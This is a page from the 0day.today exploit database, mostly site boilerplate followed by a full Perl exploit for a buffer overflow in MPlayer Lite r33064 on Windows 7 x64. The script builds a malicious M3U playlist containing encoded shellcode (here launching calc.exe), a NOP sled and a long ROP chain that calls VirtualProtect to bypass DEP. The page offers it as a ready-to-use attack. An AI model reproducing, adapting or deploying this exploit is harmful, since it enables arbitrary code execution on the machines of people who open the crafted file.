0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MPlayer (r33064 Lite) Buffer Overflow + ROP exploit
#!/usr/bin/perl # # Exploit Title: Mplayer BOF + ROP Exploit # Date: 04\05\2011 # Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m) # Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download # Version: Lite 33064 # Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets) # CVE : None use strict; use warnings; use IO::File; print q { BOF/ROP exploit created by Nate_M Now writing M3U file... }; # windows/exec CMD=calc.exe # x86/shikata_ga_nai size 227 # badchars = '\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f' my $shellcode = "\xe8\xff\xff\xff\xff\xc8\x5a\x2b\xc9\xb1\x33" . "\xb8\xc4\xc4\xb8\xb3\x66\x81\xec\x10\x10" . "\x31\x42\x17\x83\xc2\x04\x03\x86\xd7\x5a\x46\xfa" . "\x30\x13\xa9\x02\xc1\x44\x23\xe7\xf0\x56\x57\x6c\xa0\x66" . "\x13\x20\x49\x0c\x71\xd0\xda\x60\x5e\xd7\x6b\xce\xb8\xd6" . "\x6c\xfe\x04\xb4\xaf\x60\xf9\xc6\xe3\x42\xc0\x09\xf6\x83" . "\x05\x77\xf9\xd6\xde\xfc\xa8\xc6\x6b\x40\x71\xe6\xbb\xcf" . "\xc9\x90\xbe\x0f\xbd\x2a\xc0\x5f\x6e\x20\x8a\x47\x04\x6e" . "\x2b\x76\xc9\x6c\x17\x31\x66\x46\xe3\xc0\xae\x96\x0c\xf3" . "\x8e\x75\x33\x3c\x03\x87\x73\xfa\xfc\xf2\x8f\xf9\x81\x04" . "\x54\x80\x5d\x80\x49\x22\x15\x32\xaa\xd3\xfa\xa5\x39\xdf" . "\xb7\xa2\x66\xc3\x46\x66\x1d\xff\xc3\x89\xf2\x76\x97\xad" . "\xd6\xd3\x43\xcf\x4f\xb9\x22\xf0\x90\x65\x9a\x54\xda\x87" . "\xcf\xef\x81\xcd\x0e\x7d\xbc\xa8\x11\x7d\xbf\x9a\x79\x4c" . "\x34\x75\xfd\x51\x9f\x32\xf1\x1b\x82\x12\x9a\xc5\x56\x27" . "\xc7\xf5\x8c\x6b\xfe\x75\x25\x13\x05\x65\x4c\x16\x41\x21" . "\xbc\x6a\xda\xc4\xc2\xd9\xdb\xcc\xa0\xbc\x4f\x8c\x08\x5b" . "\xe8\x37\x55"; my $buf = "\x90" x 1000; $buf .= $shellcode; $buf .= "\x41" x (2368-length($buf));; $buf .= "0000"; # VirtualProtect addr $buf .= "1111"; # Return addr $buf .= "2222"; # lpAddress $buf .= "3333"; # dwsize $buf .= "4444"; # flNewProtect $buf .= "\x60\x63\x12\x6B"; # lpflOldProtect $buf .= "\x41" x 76; ##### Begin ROP Chain, create anchor in memory ##### $buf .= pack('V',0x649ABC7B); # PUSH ESP # POP EBX # POP ESI # RET [avformat.dll] $buf .= "\x41" x 4; $buf .= pack('V',0x6B0402A9); # MOV EAX,EBX # POP EBX # RET [avcodec.dll] $buf .= "\x41" x 4; $buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll] $buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll] $buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll] $buf .= pack('V',0x6AD79CAC); # DEC EAX # RET 68 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll] $buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AF1DCB5); # XCHG EAX,ECX # RET [avcodec.dll] $buf .= pack('V',0x6AFA5EE9); # MOV EAX,ECX # RET [avcodec.dll] $buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll] ##### Find location of VirtualProtect() in kernel32.dll ##### $buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll] $buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll] $buf .= pack('V',0x6AD5C6FD) x 2; # INC EAX # RET 6B [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET D6 [avcodec.dll] $buf .= pack('V',0x6AD5C6FD); # INC EAX # RET D7 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1AE [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 35C [avcodec.dll] $buf .= pack('V',0x6AD5C6FD); # INC EAX # RET 35D [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 6BA [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET D74 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1AE8 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 35D0 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AF1DCB5); # XCHG EAX,ECX # RET [avcodec.dll] $buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AE8F378); # MOV EAX,DWORD PTR DS:[EAX] # RET [avcodec.dll] $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll] $buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll] $buf .= pack('V',0x6AD79CAC) x 12; # DEC EAX # RET 5D [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET BA [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 174 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 2E8 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 5D0 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET BA0 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1740 [avcodec.dll] $buf .= pack('V',0x6AD5C6FD); # INC EAX # RET 1741 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 2E82 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll] $buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll] $buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll] ##### Find location of shellcode ##### $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll] $buf .= pack('V',0x6B0B79D2); # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll] $buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll] $buf .= pack('V',0x6AD79CAC) x 31; # DEC EAX # RET 4A [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 94 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 128 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 250 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 4A0 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 940 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll] $buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll] $buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll] $buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll] $buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll] ##### Find approx length of shellcode ##### $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll] $buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll] ##### Set shellcode to read/write ##### $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll] $buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET 4 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 8 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 10 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 20 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 40 [avcodec.dll] $buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll] $buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll] $buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll] ##### And profit ##### $buf .= pack('V',0x6AD79CAC) x 16; # DEC EAX # RET [avcodec.dll] $buf .= pack('V',0x6AD44B94); # XCHG EAX,ESP # RET $buf .= "\x41" x (5172-length($buf));; $buf .= "\xff\xff\xff\xff"; $buf .= pack('V',0x64953AD6); # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET $buf .= "\x41" x 2000; open(my $FILE,">Exploit.m3u") || die "**Error:\n$!\n"; print $FILE "http:// ".$buf; close($FILE); print "\tFile Created With Sucess\n\n"; # 0day.today [2024-12-24] #